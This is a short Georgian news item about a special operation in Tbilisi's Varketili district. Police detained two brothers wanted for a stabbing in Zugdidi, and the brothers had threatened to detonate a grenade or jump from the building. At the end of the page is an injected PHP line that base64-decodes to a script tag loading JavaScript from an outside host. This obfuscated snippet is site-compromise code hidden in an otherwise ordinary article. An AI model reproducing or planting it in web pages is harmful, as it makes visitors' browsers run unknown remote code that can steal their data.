celsiusi
ავერსი საქკაბელი

ვარკეთილში სპეცოპერაცია ჩატარდა. სამართალდამცავებმა შუამთის 10 ნომერში, საცხოვრებელი კორპუსიდან ძმები ბექა და გიორგი შენგელიები აიყვანეს.

არსებული ინფორმაციით, მათ 3 კვირა,   ზუგდიდში მოქალაქის დაჭრის გამო ეძებდნენ. ამ დროისათვის ადგილზე ექსპერტ-კრიმინალისტებს ელოდებიან, იქამდე კი სპეცოპერაცია სპეცრაზზმა ჩაატარა. კორპუსთან გაშლილი იყო უსაფრთხოების ბალიშიც, რადგან ძმები ხელყუმბარის აფეთქებით, ასევე კორპუსიდან გადმოხტომით იმუქრებოდნენ იმ შემთხვევაში, თუ სამართალდამცველები ძალას გამოიყენებდნენ. 
 
ზუგდიდში მომხდარ დაჭრასთან დაკავშირებით, სულ სამი პირი იყო ძებნილი, მათგან ერთი, მიხეილ ხარებავა სამართალდამცველებმა რამდენიმე დღის წინ დააკავეს.
 
 
 
წყარო:მთავარი არხი
986
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");